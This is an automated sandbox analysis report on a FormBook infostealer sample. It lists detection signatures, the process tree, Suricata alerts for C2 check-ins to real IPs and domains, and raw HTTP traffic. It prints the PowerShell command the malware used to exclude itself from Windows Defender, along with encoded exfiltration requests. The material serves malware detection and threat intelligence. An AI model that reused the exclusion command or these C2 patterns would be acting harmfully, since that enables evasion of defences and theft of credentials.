Windows Analysis Report
Item-RQF-9456786.exe

Overview

General Information

Sample name:Item-RQF-9456786.exe
Analysis ID:1555193
MD5:2980d8a9894fb28427f03922f74d1c76
SHA1:615db143a4eaca8788e1110be17e3c2144a594fc
SHA256:c38ac70a0c3bcc6f2f94c6ba1f74365666a20bd8fa7ed97e6c343dcf998f0535

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Item-RQF-9456786.exe (PID: 1628 cmdline: "C:\Users\user\Desktop\Item-RQF-9456786.exe" MD5: 2980D8A9894FB28427F03922F74D1C76)
    • powershell.exe (PID: 2292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Item-RQF-9456786.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\Item-RQF-9456786.exe" MD5: 2980D8A9894FB28427F03922F74D1C76)
      • LiiDBuNLRIYu.exe (PID: 1568 cmdline: "C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fontview.exe (PID: 2584 cmdline: "C:\Windows\SysWOW64\fontview.exe" MD5: 8324ECE6961ADBE6120CCE9E0BC05F76)
          • LiiDBuNLRIYu.exe (PID: 3160 cmdline: "C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1408 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: Item-RQF-9456786.exe PID: 1628 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

    System Summary

    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Item-RQF-9456786.exe", ParentImage: C:\Users\user\Desktop\Item-RQF-9456786.exe, ParentProcessId: 1628, ParentProcessName: Item-RQF-9456786.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", ProcessId: 2292, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Item-RQF-9456786.exe", ParentImage: C:\Users\user\Desktop\Item-RQF-9456786.exe, ParentProcessId: 1628, ParentProcessName: Item-RQF-9456786.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", ProcessId: 2292, ProcessName: powershell.exe


    AV Detection

    Source: Item-RQF-9456786.exe, ReversingLabs: Detection: 39%
    Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
    Source: Item-RQF-9456786.exe, Joe Sandbox ML: detected
    Source: Item-RQF-9456786.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Item-RQF-9456786.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: fontview.pdbGCTL source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000002.4741009013.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fontview.pdb source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000002.4741009013.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: xtjX.pdbSHA256}Mz source: Item-RQF-9456786.exe
    Source: Binary string: wntdll.pdbUGP source: Item-RQF-9456786.exe, 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2560730066.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2568690850.0000000004DF2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: Item-RQF-9456786.exe, Item-RQF-9456786.exe, 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, fontview.exe, 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2560730066.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2568690850.0000000004DF2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: xtjX.pdb source: Item-RQF-9456786.exe
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0301C700 FindFirstFileW,FindNextFileW,FindClose,10_2_0301C700
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then xor eax, eax10_2_03009E80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then pop edi10_2_0300E2F4
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then mov ebx, 00000004h10_2_04EB04F8
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then pop edi11_2_04CDF65A
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then pop edi11_2_04CDE944
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then pop edi11_2_04CE096C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then xor eax, eax11_2_04CE4179
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then mov esp, ebp11_2_04CDE2A1

    Networking

    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49950 -> 185.134.245.113:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49950 -> 185.134.245.113:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49986 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49990 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50026 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50026 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 163.44.185.183:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49994 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50010 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50018 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50002 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50006 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50022 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50014 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50030 -> 163.44.185.183:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50030 -> 163.44.185.183:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 163.44.185.183:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50034 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50034 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 163.44.185.183:80
    Source: DNS query: www.ecojomos.xyz
    Source: Joe Sandbox ViewIP Address: 109.70.26.37 109.70.26.37
    Source: Joe Sandbox ViewIP Address: 20.2.249.7 20.2.249.7
    Source: Joe Sandbox ViewASN Name: RU-CENTERRU RU-CENTERRU
    Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
    Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49727
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49940
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 13 Nov 2024 14:36:40 GMTserver: Apacheset-cookie: __tad=1731508600.3861162; expires=Sat, 11-Nov-2034 14:36:40 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 13 Nov 2024 14:36:43 GMTserver: Apacheset-cookie: __tad=1731508603.5858274; expires=Sat, 11-Nov-2034 14:36:43 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 88 90 26 13 1c 04 00 00 Data Ascii: TM0=7b=$qW q8 !8]8#3iTwiX|I<~o8eK}W%eU6nKq$etP?I:ES^TA?xcI`[*R*)kQ;DJ~_<l$B5( F{P;[ %4@-30x1e\LQZMY>TiQS<g /furLddBB@6^E5ION>]U6(;12YlVpl +Vl2{:(v&bKm;]}>rt)Ws!b7mm:\\8G0o6uWqbykY\&RA8z}-zR(8X7){$N/dm<@D.|x/hy@+&
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 13 Nov 2024 14:36:46 GMTserver: Apacheset-cookie: __tad=1731508606.5697575; expires=Sat, 11-Nov-2034 14:36:46 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 57 15 20 b5 71 38 20 21 81 38 a0 5d 38 23 af 33 69 bc 9b d8 c1 9e b6 54 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 3f 49 dc aa 9d 3a 45 53 08 5e cb 54 dc 06 d1 18 bb 41 3f 78 63 49 18 d3 60 d1 1b 5b dc 86 b4 2a c5 09 fb 52 aa 2a d9 29 0f 1e 6b e3 51 d3 f7 ce d8 3b 90 90 b5 44 c3 4a 88 fd 7e 5f 3c a9 13 c3 f2 12 c5 bb 6c 9d 24 42 c0 35 12 28 20 d3 a3 db 12 b8 06 96 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 f8 13 f5 96 90 81 0f 25 c0 34 40 2d c2 33 e5 30 78 d7 9b c0 31 65 ba 00 8d f3 10 5c 8f 4c 51 c1 d9 a4 d9 5a 4d c6 59 3e ee ba 1b a5 ef ae a6 54 f9 1c ee 93 d9 de d8 da ed 8b ce 69 15 51 85 c7 a1 53 1a f3 df 3c 9d 67 cd 20 2f de 66 f3 75 72 4c 12 f2 87 c8 64 95 81 c0 d7 fe eb 64 42 42 40 9a 36 f9 9f d5 5e 45 83 cc 9f c5 86 35 c3 97 49 b3 84 0f 4f 4e 3e 5d b3 0e 55 e7 f7 bd b3 86 1c 87 36 ab 28 3b e0 31 32 1f 59 c9 6c 56 70 13 6c de 0c 20 2b ce 56 6c 90 ed cc 1f e3 fc 32 f3 18 b6 1d c5 f3 7b 88 fb a9 b0 8f 3a a3 9d ec fc 84 28 76 26 c4 62 1f eb f5 08 d3 1d aa 07 4b f9 93 bb f9 e9 f4 ff da 15 cb 8c 84 a8 fb 08 8c d5 6d 8e de 8f 1d ff fb 3b 8c 5d 7d 3e 72 74 e0 29 86 1b 57 73 a3 21 62 37 de 6d 6d bd 3a bb 5c 5c ea e5 1b 38 02 a3 47 10 d3 a6 cb 30 a2 6f 36 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac 7a df 19 7d 07 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 c7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 ed ea b3 7c a9 ea eb 78 
2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 88 90 26 13 1c 04 00 00 Data Ascii: TM0=7b=$qW q8 !8]8#3iTwiX|I<~o8eK}W%eU6nKq$etP?I:ES^TA?xcI`[*R*)kQ;DJ~_<l$B5( F{P;[ %4@-30x1e\LQZMY>TiQS<g /furLddBB@6^E5ION>]U6(;12YlVpl +Vl2{:(v&bKm;]}>rt)Ws!b7mm:\\8G0o6uWqbykY\&RA8z}-zR(8X7){$N/dm<@D.|x/hy@+&
    Source: global trafficHTTP traffic detected: GET /7d81/?tXul=U2UloNhP&2J=rKnERuK87XwUpD46DfVgxrQvP3X7K9CGfDS22ViQ9f8p4xS2+clAvvHEJpZ8brBpsNS/kiukCkSqLcZJlXQs2/1YcKhhRt4ykNxCPrZ76z98Hxh/ipFlCU6POWu6VKl5iw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.bahaeng.comConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /ovl0/?2J=sybLtbK8r4s7cIP4xvr2i1/OgqOaozXkrfvLrO0saE7+04sBLyNlnPJsxyiJd448I0Eq3D8MalhBXQ7UwGRoDb3Yk8LIhQCUInzvAK5ePNY01KNz5a/RKEGS8umzny51vQ==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.atendefacil.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /j4lg/?tXul=U2UloNhP&2J=0mGuP4ABjbamojwwbGp4nd6DYCnF1PU82/RCQVDltajJwR32joy3yBdZ/4cT/JAxhTejF9/1KOpXB+u6q5pZeVP3rEdsFeaB8jVGPWY7QM3+gMMl8rd3lPw1Ny+3a69apQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.sklad-iq.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /a4nt/?2J=Y8ucfnop1/b3pfYFq01F/gO8ESspnEO25i/hccpQHURd3Ee6lJ0YewpZ26P6KIWp1n+YeG7L7VclPhA1nqTCAuTU030Z3lnUxyF2WW91OhunyyCxSBLPY4XFmWmPj9k/og==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.mdpc7.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
